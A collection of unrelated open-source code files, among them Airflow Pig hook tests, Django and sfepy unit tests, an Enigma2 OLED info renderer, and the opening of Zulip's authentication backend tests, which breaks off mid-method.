self.extra_dejson.get.assert_called_with('pig_properties', '')
@mock.patch('subprocess.Popen')
def test_run_cli_success(self, popen_mock):
proc_mock = mock.MagicMock()
proc_mock.returncode = 0
proc_mock.stdout.readline.return_value = b''
popen_mock.return_value = proc_mock
hook = self.pig_hook()
stdout = hook.run_cli("")
self.assertEqual(stdout, "")
@mock.patch('subprocess.Popen')
def test_run_cli_fail(self, popen_mock):
proc_mock = mock.MagicMock()
proc_mock.returncode = 1
proc_mock.stdout.readline.return_value = b''
popen_mock.return_value = proc_mock
hook = self.pig_hook()
from airflow.exceptions import AirflowException
self.assertRaises(AirflowException, hook.run_cli, "")
@mock.patch('subprocess.Popen')
def test_run_cli_with_properties(self, popen_mock):
test_properties = "one two"
proc_mock = mock.MagicMock()
proc_mock.returncode = 0
proc_mock.stdout.readline.return_value = b''
popen_mock.return_value = proc_mock
hook = self.pig_hook()
hook.pig_properties = test_properties
stdout = hook.run_cli("")
self.assertEqual(stdout, "")
popen_first_arg = popen_mock.call_args[0][0]
for pig_prop in test_properties.split():
self.assertIn(pig_prop, popen_first_arg)
@mock.patch('subprocess.Popen')
def test_run_cli_verbose(self, popen_mock):
test_stdout_lines = [b"one", b"two", b""]
test_stdout_strings = [s.decode('utf-8') for s in test_stdout_lines]
proc_mock = mock.MagicMock()
proc_mock.returncode = 0
proc_mock.stdout.readline = mock.Mock(side_effect=test_stdout_lines)
popen_mock.return_value = proc_mock
hook = self.pig_hook()
stdout = hook.run_cli("", verbose=True)
self.assertEqual(stdout, "".join(test_stdout_strings))
def test_kill_no_sp(self):
sp_mock = mock.Mock()
hook = self.pig_hook()
hook.sp = sp_mock
hook.kill()
self.assertFalse(sp_mock.kill.called)
def test_kill_sp_done(self):
sp_mock = mock.Mock()
sp_mock.poll.return_value = 0
hook = self.pig_hook()
hook.sp = sp_mock
hook.kill()
self.assertFalse(sp_mock.kill.called)
def test_kill(self):
sp_mock = mock.Mock()
sp_mock.poll.return_value = None
hook = self.pig_hook()
hook.sp = sp_mock
hook.kill()
self.assertTrue(sp_mock.kill.called)
|
luosch/vinda | refs/heads/master | vinda/__init__.py | 1 | #!/usr/bin/python
# -*- coding:utf-8 -*-
__title__ = 'vinda'
__version__ = '0.1.0'
__author__ = 'Sicheng Luo'
__license__ = 'MIT'
__copyright__ = 'Copyright 2016 Sicheng Luo'
from .vinda import look |
aberon10/training | refs/heads/master | training/ticketing_system/apps.py | 1 | from django.apps import AppConfig
class TicketingSystemConfig(AppConfig):
name = 'ticketing_system'
|
lathama/Adynaton | refs/heads/master | adynaton/unittests/test_DomainNameSystemClient.py | 1 | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import unittest
from adynaton.dns import DomainNameSystemClient
class TestDomainNameSystemClient(unittest.TestCase):
"""
Test for Object
"""
def setUp(self):
"""
Setup for unit tests
"""
self.theclass = DomainNameSystemClient()
self.theclass.DNS_UDP_port = 0
self.DNS_query = "example.com"
def test_set_query(self):
"""
Method Test
"""
self.theclass.set_query(self.DNS_query)
self.assertEqual(self.theclass.DNS_query, self.DNS_query)
|
jamespacileo/django-france | refs/heads/master | tests/modeltests/one_to_one/tests.py | 92 | from django.test import TestCase
from django.db import transaction, IntegrityError
from models import Place, Restaurant, Waiter, ManualPrimaryKey, RelatedModel, MultiModel
class OneToOneTests(TestCase):
def setUp(self):
self.p1 = Place(name='Demon Dogs', address='944 W. Fullerton')
self.p1.save()
self.p2 = Place(name='Ace Hardware', address='1013 N. Ashland')
self.p2.save()
self.r = Restaurant(place=self.p1, serves_hot_dogs=True, serves_pizza=False)
self.r.save()
def test_getter(self):
# A Restaurant can access its place.
self.assertEqual(repr(self.r.place), '<Place: Demon Dogs the place>')
# A Place can access its restaurant, if available.
self.assertEqual(repr(self.p1.restaurant), '<Restaurant: Demon Dogs the restaurant>')
# p2 doesn't have an associated restaurant.
self.assertRaises(Restaurant.DoesNotExist, getattr, self.p2, 'restaurant')
def test_setter(self):
# Set the place using assignment notation. Because place is the primary
# key on Restaurant, the save will create a new restaurant
self.r.place = self.p2
self.r.save()
self.assertEqual(repr(self.p2.restaurant), '<Restaurant: Ace Hardware the restaurant>')
self.assertEqual(repr(self.r.place), '<Place: Ace Hardware the place>')
self.assertEqual(self.p2.pk, self.r.pk)
# Set the place back again, using assignment in the reverse direction.
self.p1.restaurant = self.r
self.assertEqual(repr(self.p1.restaurant), '<Restaurant: Demon Dogs the restaurant>')
r = Restaurant.objects.get(pk=self.p1.id)
self.assertEqual(repr(r.place), '<Place: Demon Dogs the place>')
def test_manager_all(self):
# Restaurant.objects.all() just returns the Restaurants, not the Places.
self.assertQuerysetEqual(Restaurant.objects.all(), [
'<Restaurant: Demon Dogs the restaurant>',
])
# Place.objects.all() returns all Places, regardless of whether they
# have Restaurants.
self.assertQuerysetEqual(Place.objects.order_by('name'), [
'<Place: Ace Hardware the place>',
'<Place: Demon Dogs the place>',
])
def test_manager_get(self):
def assert_get_restaurant(**params):
self.assertEqual(repr(Restaurant.objects.get(**params)),
'<Restaurant: Demon Dogs the restaurant>')
assert_get_restaurant(place__id__exact=self.p1.pk)
assert_get_restaurant(place__id=self.p1.pk)
assert_get_restaurant(place__exact=self.p1.pk)
assert_get_restaurant(place__exact=self.p1)
assert_get_restaurant(place=self.p1.pk)
assert_get_restaurant(place=self.p1)
assert_get_restaurant(pk=self.p1.pk)
assert_get_restaurant(place__pk__exact=self.p1.pk)
assert_get_restaurant(place__pk=self.p1.pk)
assert_get_restaurant(place__name__startswith="Demon")
def assert_get_place(**params):
self.assertEqual(repr(Place.objects.get(**params)),
'<Place: Demon Dogs the place>')
assert_get_place(restaurant__place__exact=self.p1.pk)
assert_get_place(restaurant__place__exact=self.p1)
assert_get_place(restaurant__place__pk=self.p1.pk)
assert_get_place(restaurant__exact=self.p1.pk)
assert_get_place(restaurant__exact=self.r)
assert_get_place(restaurant__pk=self.p1.pk)
assert_get_place(restaurant=self.p1.pk)
assert_get_place(restaurant=self.r)
assert_get_place(id__exact=self.p1.pk)
assert_get_place(pk=self.p1.pk)
def test_foreign_key(self):
# Add a Waiter to the Restaurant.
w = self.r.waiter_set.create(name='Joe')
w.save()
self.assertEqual(repr(w), '<Waiter: Joe the waiter at Demon Dogs the restaurant>')
# Query the waiters
def assert_filter_waiters(**params):
self.assertQuerysetEqual(Waiter.objects.filter(**params), [
'<Waiter: Joe the waiter at Demon Dogs the restaurant>'
])
assert_filter_waiters(restaurant__place__exact=self.p1.pk)
assert_filter_waiters(restaurant__place__exact=self.p1)
assert_filter_waiters(restaurant__place__pk=self.p1.pk)
assert_filter_waiters(restaurant__exact=self.p1.pk)
assert_filter_waiters(restaurant__exact=self.p1)
assert_filter_waiters(restaurant__pk=self.p1.pk)
assert_filter_waiters(restaurant=self.p1.pk)
assert_filter_waiters(restaurant=self.r)
assert_filter_waiters(id__exact=self.p1.pk)
assert_filter_waiters(pk=self.p1.pk)
# Delete the restaurant; the waiter should also be removed
r = Restaurant.objects.get(pk=self.p1.pk)
r.delete()
self.assertEqual(Waiter.objects.count(), 0)
def test_multiple_o2o(self):
# One-to-one fields still work if you create your own primary key
o1 = ManualPrimaryKey(primary_key="abc123", name="primary")
o1.save()
o2 = RelatedModel(link=o1, name="secondary")
o2.save()
# You can have multiple one-to-one fields on a model, too.
x1 = MultiModel(link1=self.p1, link2=o1, name="x1")
x1.save()
self.assertEqual(repr(o1.multimodel), '<MultiModel: Multimodel x1>')
# This will fail because each one-to-one field must be unique (and
# link2=o1 was used for x1, above).
sid = transaction.savepoint()
mm = MultiModel(link1=self.p2, link2=o1, name="x1")
self.assertRaises(IntegrityError, mm.save)
transaction.savepoint_rollback(sid)
|
sfepy/sfepy | refs/heads/master | tests/test_dg_terms_calls.py | 4 | # -*- coding: utf-8 -*-
"""
Test all terms in terms_dg. Performs numerical test on simple mesh.
"""
import functools
import inspect
import numpy as nm
import numpy.testing as nmts
import scipy.sparse as sp
from sfepy.base.base import Struct
from sfepy.base.testing import TestCommon
from sfepy.discrete import DGFieldVariable, Material, Integral
from sfepy.discrete import Variables
from sfepy.discrete.common.dof_info import EquationMap
from sfepy.terms.terms_dg import AdvectionDGFluxTerm, \
NonlinearHyperbolicDGFluxTerm, NonlinearScalarDotGradTerm, \
DiffusionDGFluxTerm, DiffusionInteriorPenaltyTerm
from test_dg_field import prepare_dgfield_1D, prepare_field_2D
class Test(TestCommon):
def capture_assertion_decorator(self, method):
@functools.wraps(method)
def captured_assertion_method(_):
try:
method()
except AssertionError:
return False
return True
return captured_assertion_method.__get__(self, self.__class__)
@staticmethod
def from_conf(conf, options):
"""
Filters out terms test classes and gathers their test methods in
resulting object.
"""
term_test_classes = [(key, var) for key, var in dict(globals()).items()
if (key.startswith("Test") and key.endswith("Term"))]
all_test = Test()
for cname, term_test_cls in term_test_classes:
term_test = term_test_cls()
methods = inspect.getmembers(term_test, inspect.ismethod)
all_test.update({"{}_{}".format(mname, cname[4:]):
all_test.capture_assertion_decorator(meth)
for mname, meth in methods})
return all_test
class DGTermTestEnvornment:
"""
Class for easy creation of all the data needed for testing terms.
"""
def burg_fun(self, u):
vu = self.burg_velo * u[..., None] ** 2
return vu
def burg_fun_d(self, u):
v1 = 2 * self.burg_velo * u[..., None]
return v1
def __init__(self, dim, approx_order, **kwargs):
"""
Creates Struct object with all the data necessary to test terms
:param dim: dimension
:param approx_order: approximation order
:param kwargs: velo, diffusion or penalty for prepare_materials
:return: term test scope
"""
if dim == 1:
(field, regions), mesh = prepare_dgfield_1D(approx_order)
elif dim == 2:
(field, regions), mesh = prepare_field_2D(approx_order)
self.field = field
self.regions = regions
self.mesh = mesh
self.n_cell = field.n_cell
self.n_nod = field.n_nod
self.n_el_nod = field.n_el_nod
self.u, self.v = self.prepare_variables(field)
self.u.data = [(nm.zeros(self.n_nod))]
self.variables = Variables([ self.u, self.v])
self.integral = Integral('i', order=approx_order * 2)
self.a, self.D, self.Cw = self.prepare_materials(field, **kwargs)
if dim == 1:
velo = nm.array(1.0)
elif dim == 2:
velo = nm.array([1.0, 0])
self.burg_velo = velo.T / nm.linalg.norm(velo)
self.nonlin = Material('nonlin',
values={'.fun': self.burg_fun,
'.dfun': self.burg_fun_d})
self.out = nm.zeros((self.n_cell, 1, self.n_el_nod, 1))
def prepare_variables(self, field):
"""
Prepares state and test variables, adds empty
eq_map to state variable
:param field:
:return: state, test
"""
n_nod = field.n_nod
u = DGFieldVariable('u', 'unknown', field, history=1)
v = DGFieldVariable('v', 'test', field, primary_var_name='u')
var_di = Struct(
details=Struct(dpn=1, n_nod=n_nod,
name="field_var_dof_details"),
indx=slice(0, n_nod, None), n_dof=n_nod, name='u_dof_info',
var_name="u")
u.eq_map = EquationMap("eq_map", ["u.0"], var_di)
u.eq_map._init_empty(field)
return u, v
def prepare_materials(self, field, velo=1.0, diffusion=0.1, penalty=100):
"""
Crates material objects with data attribute, containing properly shaped
data to pass to terms
:param field: DGField
:param velo: optional values for velocity a
:param diffusion: optional value for diffusion tensor D
:param penalty: optional value for diffusion penalty Cw
:return: a, D, Cw
"""
a = Material('a', val=[velo])
a.data = nm.ones((field.n_cell, 1)) * velo
D = Material('D', val=[diffusion])
D.data = nm.ones((field.n_cell, 1, 1)) * diffusion
Cw = Material("Cw", values={".val": penalty})
Cw.data = penalty
return a, D, Cw
class TestAdvectDGFluxTerm:
def test_function_explicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = AdvectionDGFluxTerm("adv_stiff(a.val, u, v)",
"a.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, a=te.a)
# te.u.data[0][::te.n_el_nod] = 1
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out,
te.u,
None, # diff_var
te.field,
te.regions["omega"],
te.a.data
)
nmts.assert_almost_equal(out, result)
return True
def test_function_implicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = AdvectionDGFluxTerm("adv_stiff(a.val, u, v)",
"a.val, u, v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, a=te.a)
# te.u.data[0][::ts.n_el_nod] = 1
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out, note that for implicit mode the out
# argument is ignored
te.u, # state
"u", # diff_var
te.field,
te.regions["omega"],
te.a.data, # advelo
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
class TestNonlinearHyperDGFluxTerm:
def test_function_explicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = NonlinearHyperbolicDGFluxTerm("adv_stiff(f, df u, v)",
"nonlin.f, nonlin.df, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, nonlin=te.nonlin)
# te.u.data[0][::ts.n_el_nod] = 1
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out,
te.u,
te.field,
te.regions["omega"],
te.burg_fun,
te.burg_fun_d
)
nmts.assert_almost_equal(out, result)
return True
class TestDiffusionDGFluxTerm:
def test_function_explicit_right_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, v, u)",
"D.val, v, u[-1]",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_state"
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out, # out
te.u, # state
None, # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
nmts.assert_almost_equal(out, result)
return True
def test_function_explicit_left_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, u, v)",
"D.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_virtual"
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out, # out
te.u, # state
None, # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
nmts.assert_almost_equal(out, result)
return True
def test_function_implicit_right_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, v, u)",
"D.val, v, u",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_state"
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out
te.u, # state
"u", # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
def test_function_implicit_left_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, u, v)",
"D.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_virtual"
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out
te.u, # state
"u", # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
class TestDiffusionInteriorPenaltyTerm:
def test_function_explicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionInteriorPenaltyTerm("adv_stiff(Cw.val, u, v)",
"Cw.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, Cw=te.Cw)
# te.u.data[0][::ts.n_el_nod] = 1
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out,
te.u,
None, # diff_var
te.field,
te.regions["omega"],
te.Cw.data,
te.D.data
)
nmts.assert_almost_equal(out, result)
return True
def test_function_implicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionInteriorPenaltyTerm("adv_stiff(D.val, a.val, u, v)",
"Cw.val, u, v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, a=te.Cw)
# te.u.data[0][::ts.n_el_nod] = 1
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out, note that for implicit mode the out
# argument is ignored
te.u, # state
"u", # diff_var
te.field,
te.regions["omega"],
te.Cw.data,
te.D.data,
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
class TestNonlinScalarDotGradTerm:
def test_function_explicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = NonlinearScalarDotGradTerm("adv_stiff(f, df u, v)",
"nonlin.f, nonlin.df, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, nonlin=te.nonlin)
term.setup()
# te.u.data[0][::ts.n_el_nod] = 1
expected = nm.zeros(te.out.shape)
out = nm.zeros(te.out.shape)
fargs = term.get_fargs(
te.burg_fun,
te.burg_fun_d,
te.u,
te.v
)
fargs = (out,) + fargs
out = term.function(*fargs)
nmts.assert_almost_equal(out, expected)
return True
if __name__ == '__main__':
t = Test()
t.test_dg_term_calls() |
sklnet/openhdf-enigma2 | refs/heads/master | lib/python/Components/Renderer/valioOledInfo.py | 2 | # -*- coding: utf-8 -*-
#
# OLED-Info Renderer for Dreambox/Enigma-2
# Version: 1.0
# Coded by Vali (c)2011
#
#######################################################################
from enigma import eLabel
from Renderer import Renderer
from os import popen
from time import localtime, strftime
from Components.VariableText import VariableText
from Components.Sensors import sensors
from Components.config import config
from Tools.HardwareInfo import HardwareInfo
class valioOledInfo(Renderer, VariableText):
def __init__(self):
Renderer.__init__(self)
VariableText.__init__(self)
try:
self.infozahl = int(config.valiflex.OledInfo.value)
except:
self.infozahl = 12
self.Zaehler = 0
self.oben = "---"
self.unten = "---"
GUI_WIDGET = eLabel
def changed(self, what):
if not self.suspended:
if self.Zaehler > self.infozahl:
self.Zaehler = 0
if self.Zaehler == 0:
self.hide()
elif self.Zaehler == 6:
self.show()
t = localtime(self.source.time)
self.oben = _(strftime("%a", t)) + " " +strftime("%d", t)
self.unten = "%02d:%02d" % (t.tm_hour, t.tm_min)
elif self.Zaehler == 14:
self.oben = "temp:"
maxtemp = 0
try:
templist = sensors.getSensorsList(sensors.TYPE_TEMPERATURE)
tempcount = len(templist)
for count in range(tempcount):
id = templist[count]
tt = sensors.getSensorValue(id)
if tt > maxtemp:
maxtemp = tt
except:
pass
self.unten = str(maxtemp) + " °C"
elif self.Zaehler == 21:
self.oben = "loads:"
loada = 0
try:
out_line = open("/proc/loadavg").readline()
loada = out_line[:4]
except:
pass
self.unten = loada
elif self.Zaehler == 28:
self.oben = "free:"
out_lines = []
out_lines = open("/proc/meminfo").readlines()
for lidx in range(len(out_lines)-1):
tstLine = out_lines[lidx].split()
if "MemFree:" in tstLine:
templ = int(out_lines[lidx].split()[1])
fmem = "%d mb" %(templ/1024)
self.unten = str(fmem)
self.Zaehler = self.Zaehler + 1
self.text = self.oben + "\n" + self.unten
def onShow(self):
self.suspended = False
self.changed(None)
def onHide(self):
self.suspended = True
|
Galexrt/zulip | refs/heads/master | zerver/tests/test_auth_backends.py | 2 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.core import mail
from django.http import HttpResponse
from django.test import override_settings
from django_auth_ldap.backend import _LDAPUser
from django.contrib.auth import authenticate
from django.test.client import RequestFactory
from typing import Any, Callable, Dict, List, Optional, Text
from builtins import object
from oauth2client.crypt import AppIdentityError
from django.core import signing
from django.core.urlresolvers import reverse
import jwt
import mock
import re
import time
from zerver.forms import HomepageForm
from zerver.lib.actions import (
do_deactivate_realm,
do_deactivate_user,
do_reactivate_realm,
do_reactivate_user,
do_set_realm_authentication_methods,
create_stream_if_needed,
)
from zerver.lib.mobile_auth_otp import otp_decrypt_api_key
from zerver.lib.validator import validate_login_email, \
check_bool, check_dict_only, check_string
from zerver.lib.request import JsonableError
from zerver.lib.initial_password import initial_password
from zerver.lib.sessions import get_session_dict_user
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.test_helpers import POSTRequestMock
from zerver.models import \
get_realm, email_to_username, UserProfile, \
PreregistrationUser, Realm, get_user, MultiuseInvite
from confirmation.models import Confirmation, confirmation_url, create_confirmation_link
from zproject.backends import ZulipDummyBackend, EmailAuthBackend, \
GoogleMobileOauth2Backend, ZulipRemoteUserBackend, ZulipLDAPAuthBackend, \
ZulipLDAPUserPopulator, DevAuthBackend, GitHubAuthBackend, ZulipAuthMixin, \
dev_auth_enabled, password_auth_enabled, github_auth_enabled, \
require_email_format_usernames, SocialAuthMixin, AUTH_BACKEND_NAME_MAP, \
ZulipLDAPConfigurationError
from zerver.views.auth import (maybe_send_to_registration,
login_or_register_remote_user,
_subdomain_token_salt)
from version import ZULIP_VERSION
from social_core.exceptions import AuthFailed, AuthStateForbidden
from social_django.strategy import DjangoStrategy
from social_django.storage import BaseDjangoStorage
from social_core.backends.github import GithubOrganizationOAuth2, GithubTeamOAuth2, \
GithubOAuth2
from six.moves import urllib
from six.moves.http_cookies import SimpleCookie
import ujson
from zerver.lib.test_helpers import MockLDAP, load_subdomain_token
class AuthBackendTest(ZulipTestCase):
def get_username(self, email_to_username=None):
# type: (Optional[Callable[[Text], Text]]) -> Text
username = self.example_email('hamlet')
if email_to_username is not None:
username = email_to_username(self.example_email('hamlet'))
return username
def verify_backend(self, backend, good_kwargs=None, bad_kwargs=None):
# type: (Any, Optional[Dict[str, Any]], Optional[Dict[str, Any]]) -> None
user_profile = self.example_user('hamlet')
assert good_kwargs is not None
# If bad_kwargs was specified, verify auth fails in that case
if bad_kwargs is not None:
self.assertIsNone(backend.authenticate(**bad_kwargs))
# Verify auth works
result = backend.authenticate(**good_kwargs)
self.assertEqual(user_profile, result)
# Verify auth fails with a deactivated user
do_deactivate_user(user_profile)
self.assertIsNone(backend.authenticate(**good_kwargs))
# Reactivate the user and verify auth works again
do_reactivate_user(user_profile)
result = backend.authenticate(**good_kwargs)
self.assertEqual(user_profile, result)
# Verify auth fails with a deactivated realm
do_deactivate_realm(user_profile.realm)
self.assertIsNone(backend.authenticate(**good_kwargs))
# Verify auth works again after reactivating the realm
do_reactivate_realm(user_profile.realm)
result = backend.authenticate(**good_kwargs)
self.assertEqual(user_profile, result)
# ZulipDummyBackend isn't a real backend so the remainder
# doesn't make sense for it
if isinstance(backend, ZulipDummyBackend):
return
# Verify auth fails if the auth backend is disabled on server
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipDummyBackend',)):
self.assertIsNone(backend.authenticate(**good_kwargs))
# Verify auth fails if the auth backend is disabled for the realm
for backend_name in AUTH_BACKEND_NAME_MAP.keys():
if isinstance(backend, AUTH_BACKEND_NAME_MAP[backend_name]):
break
index = getattr(user_profile.realm.authentication_methods, backend_name).number
user_profile.realm.authentication_methods.set_bit(index, False)
user_profile.realm.save()
self.assertIsNone(backend.authenticate(**good_kwargs))
user_profile.realm.authentication_methods.set_bit(index, True)
user_profile.realm.save()
def test_dummy_backend(self):
# type: () -> None
username = self.get_username()
self.verify_backend(ZulipDummyBackend(),
good_kwargs=dict(username=username,
use_dummy_backend=True),
bad_kwargs=dict(username=username,
use_dummy_backend=False))
def setup_subdomain(self, user_profile):
# type: (UserProfile) -> None
realm = user_profile.realm
realm.string_id = 'zulip'
realm.save()
def test_email_auth_backend(self):
# type: () -> None
username = self.get_username()
user_profile = self.example_user('hamlet')
password = "testpassword"
user_profile.set_password(password)
user_profile.save()
with mock.patch('zproject.backends.email_auth_enabled',
return_value=False), \
mock.patch('zproject.backends.password_auth_enabled',
return_value=True):
return_data = {} # type: Dict[str, bool]
user = EmailAuthBackend().authenticate(self.example_email('hamlet'),
password=password,
return_data=return_data)
self.assertEqual(user, None)
self.assertTrue(return_data['email_auth_disabled'])
self.verify_backend(EmailAuthBackend(),
good_kwargs=dict(password=password,
username=username,
realm_subdomain='zulip',
return_data=dict()),
bad_kwargs=dict(password=password,
username=username,
realm_subdomain='acme',
return_data=dict()))
def test_email_auth_backend_disabled_password_auth(self):
# type: () -> None
user_profile = self.example_user('hamlet')
password = "testpassword"
user_profile.set_password(password)
user_profile.save()
# Verify if a realm has password auth disabled, correct password is rejected
with mock.patch('zproject.backends.password_auth_enabled', return_value=False):
self.assertIsNone(EmailAuthBackend().authenticate(self.example_email('hamlet'), password))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipDummyBackend',))
def test_no_backend_enabled(self):
# type: () -> None
result = self.client_get('/login/')
self.assert_in_success_response(["No authentication backends are enabled"], result)
result = self.client_get('/register/')
self.assert_in_success_response(["No authentication backends are enabled"], result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_any_backend_enabled(self):
# type: () -> None
# testing to avoid false error messages.
result = self.client_get('/login/')
self.assert_not_in_success_response(["No Authentication Backend is enabled."], result)
result = self.client_get('/register/')
self.assert_not_in_success_response(["No Authentication Backend is enabled."], result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_google_backend(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
backend = GoogleMobileOauth2Backend()
payload = dict(email_verified=True,
email=email)
with mock.patch('apiclient.sample_tools.client.verify_id_token', return_value=payload):
self.verify_backend(backend,
good_kwargs=dict(realm_subdomain="zulip"),
bad_kwargs=dict(realm_subdomain='acme'))
# Verify valid_attestation parameter is set correctly
unverified_payload = dict(email_verified=False)
with mock.patch('apiclient.sample_tools.client.verify_id_token', return_value=unverified_payload):
ret = dict() # type: Dict[str, str]
result = backend.authenticate(return_data=ret)
self.assertIsNone(result)
self.assertFalse(ret["valid_attestation"])
nonexistent_user_payload = dict(email_verified=True, email="[email protected]")
with mock.patch('apiclient.sample_tools.client.verify_id_token',
return_value=nonexistent_user_payload):
ret = dict()
result = backend.authenticate(return_data=ret)
self.assertIsNone(result)
self.assertTrue(ret["valid_attestation"])
with mock.patch('apiclient.sample_tools.client.verify_id_token',
side_effect=AppIdentityError):
ret = dict()
result = backend.authenticate(return_data=ret)
self.assertIsNone(result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_backend(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
password = "test_password"
self.setup_subdomain(user_profile)
username = self.get_username()
backend = ZulipLDAPAuthBackend()
# Test LDAP auth fails when LDAP server rejects password
with mock.patch('django_auth_ldap.backend._LDAPUser._authenticate_user_dn',
side_effect=_LDAPUser.AuthenticationFailed("Failed")), (
mock.patch('django_auth_ldap.backend._LDAPUser._check_requirements')), (
mock.patch('django_auth_ldap.backend._LDAPUser._get_user_attrs',
return_value=dict(full_name=['Hamlet']))):
self.assertIsNone(backend.authenticate(email, password))
with mock.patch('django_auth_ldap.backend._LDAPUser._authenticate_user_dn'), (
mock.patch('django_auth_ldap.backend._LDAPUser._check_requirements')), (
mock.patch('django_auth_ldap.backend._LDAPUser._get_user_attrs',
return_value=dict(full_name=['Hamlet']))):
self.verify_backend(backend,
bad_kwargs=dict(username=username,
password=password,
realm_subdomain='acme'),
good_kwargs=dict(username=username,
password=password,
realm_subdomain='zulip'))
def test_devauth_backend(self):
# type: () -> None
self.verify_backend(DevAuthBackend(),
good_kwargs=dict(username=self.get_username()))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',))
def test_remote_user_backend(self):
# type: () -> None
username = self.get_username()
self.verify_backend(ZulipRemoteUserBackend(),
good_kwargs=dict(remote_user=username,
realm_subdomain='zulip'),
bad_kwargs=dict(remote_user=username,
realm_subdomain='acme'))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',))
@override_settings(SSO_APPEND_DOMAIN='zulip.com')
def test_remote_user_backend_sso_append_domain(self):
# type: () -> None
username = self.get_username(email_to_username)
self.verify_backend(ZulipRemoteUserBackend(),
good_kwargs=dict(remote_user=username,
realm_subdomain='zulip'),
bad_kwargs=dict(remote_user=username,
realm_subdomain='acme'))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GitHubAuthBackend',))
def test_github_backend(self):
# type: () -> None
user = self.example_user('hamlet')
email = user.email
good_kwargs = dict(response=dict(email=email), return_data=dict(),
realm_subdomain='zulip')
bad_kwargs = dict(response=dict(email=email), return_data=dict(),
realm_subdomain='acme')
self.verify_backend(GitHubAuthBackend(),
good_kwargs=good_kwargs,
bad_kwargs=bad_kwargs)
class SocialAuthMixinTest(ZulipTestCase):
def test_social_auth_mixing(self):
# type: () -> None
mixin = SocialAuthMixin()
with self.assertRaises(NotImplementedError):
mixin.get_email_address()
with self.assertRaises(NotImplementedError):
mixin.get_full_name()
class GitHubAuthBackendTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.user_profile = self.example_user('hamlet')
self.email = self.user_profile.email
self.name = 'Hamlet'
self.backend = GitHubAuthBackend()
self.backend.strategy = DjangoStrategy(storage=BaseDjangoStorage())
self.user_profile.backend = self.backend
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.get_host = lambda: 'zulip.testserver'
